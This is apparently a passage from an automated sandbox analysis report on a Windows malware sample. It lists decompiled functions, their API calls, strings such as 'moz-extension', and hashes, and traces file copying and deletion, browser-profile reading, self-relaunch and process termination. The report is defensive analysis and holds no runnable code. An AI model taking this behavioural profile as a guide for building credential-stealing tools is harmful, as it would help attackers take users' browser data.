StrCmpCA.SHLWAPI(00000000,008998B0), ref: 0041079A
StrCmpCA.SHLWAPI(00000000,008998C0), ref: 00410866
StrCmpCA.SHLWAPI(00000000,00899890), ref: 0041099D

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

`_A, xrefs: 00410803, 0041091B, 00410806, 0041091E

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_A
API String ID: 3722407311-2339250863
Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86

Function 00826897 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 008268CA

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

ShellExecuteEx.SHELL32(0000003C), ref: 0082698D
ExitProcess.KERNEL32 ref: 008269BC

Strings

<, xrefs: 00826940

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
Instruction ID: 70ccc2915f5a38736c72e7126b2a1c9c3396e4fefb71d9f0ffee8aebf461afee
Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
Instruction Fuzzy Hash: B73126B1901228ABDB18EB94ED96FDEB778FF14300F404199F205A6191DF746B88CF5A

Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

ShellExecuteEx.SHELL32(0000003C), ref: 00416726
ExitProcess.KERNEL32 ref: 00416755

Strings

<, xrefs: 004166D9

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A

Function 00406BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F

Strings

@Jn@, xrefs: 00406C80, 00406C83
Jn@, xrefs: 00406BED, 00406C0D, 00406C8F
Jn@, xrefs: 00406C1D, 00406C39, 00406C88, 00406C98, 00406C04, 00406C28, 00406C33

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @Jn@$Jn@$Jn@
API String ID: 544645111-1180188686
Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85

Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041A972
lstrcatA.KERNEL32(00000000), ref: 0041A982

Strings

vI@, xrefs: 0041A937
vI@, xrefs: 0041A929

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: vI@$vI@
API String ID: 3905823039-1245421781
Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95

Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
wsprintfW.USER32 ref: 00418D78

Strings

%hs, xrefs: 00418D6F

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96

Function 00413BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
FindClose.KERNEL32(000000FF), ref: 00413C7C

Strings

P2#v, xrefs: 00413C67
!=A, xrefs: 00413C82

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: !=A$P2#v
API String ID: 3840410801-2183312394
Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95

Function 0081A4C7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081A548
lstrlen.KERNEL32(00000000,00000000), ref: 0081A666
lstrlen.KERNEL32(00000000), ref: 0081A923

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 0081A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0081A094

DeleteFileA.KERNEL32(00000000), ref: 0081A9AA

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
Instruction ID: 58b49278c937a6cd378b969b1c08d19b5cb5deaf2f543ec4da18c2a4c465ba5e
Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
Instruction Fuzzy Hash: 51E1BD72910128DBCB09EBA8ED92DEE7379FF14700F508159F156F2491EE346A88CB63

Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
lstrlenA.KERNEL32(00000000), ref: 0040A6BC

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

DeleteFileA.KERNEL32(00000000), ref: 0040A743

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A

Function 0081D667 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D6E8
lstrlen.KERNEL32(00000000), ref: 0081D8FF
lstrlen.KERNEL32(00000000), ref: 0081D913
DeleteFileA.KERNEL32(00000000), ref: 0081D992

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
Instruction ID: 704e107a1f82bcd8b9fb2e547d6a3a13f202c6f842a02398fe7b88ae97a9b6fb
Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
Instruction Fuzzy Hash: 4D91DF71910128DBCB0CEBA8ED96DEE7339FF14700F504569F516E2091EE346A88CB63

Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
lstrlenA.KERNEL32(00000000), ref: 0040D698
lstrlenA.KERNEL32(00000000), ref: 0040D6AC
DeleteFileA.KERNEL32(00000000), ref: 0040D72B

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A

Function 0081D9E7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081DA68
lstrlen.KERNEL32(00000000), ref: 0081DC06
lstrlen.KERNEL32(00000000), ref: 0081DC1A
DeleteFileA.KERNEL32(00000000), ref: 0081DC99

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
Instruction ID: dea75ded918a7ce0bdbf33379e3399b2e82ead97bdc8b1a117c031ed8bef0480
Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
Instruction Fuzzy Hash: 8E81CD75910228DBCF08EBA8ED96DEE7339FF54700F504569F106E6491EE346A88CB63

Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
lstrlenA.KERNEL32(00000000), ref: 0040D99F
lstrlenA.KERNEL32(00000000), ref: 0040D9B3
DeleteFileA.KERNEL32(00000000), ref: 0040DA32

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A

Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
lstrlenA.KERNEL32(00000000), ref: 0040F56B

Strings

moz-extension+++, xrefs: 0040F5AD
^userContextId=4294967295, xrefs: 0040F59C

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA

Function 00829737 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00829752

Part of subcall function 00828FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00829785,00000000), ref: 00828FC2
Part of subcall function 00828FB7: RtlAllocateHeap.NTDLL(00000000), ref: 00828FC9
Part of subcall function 00828FB7: wsprintfW.USER32 ref: 00828FDF

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00829812
TerminateProcess.KERNEL32(00000000,00000000), ref: 00829830
CloseHandle.KERNEL32(00000000), ref: 0082983D

Memory Dump Source

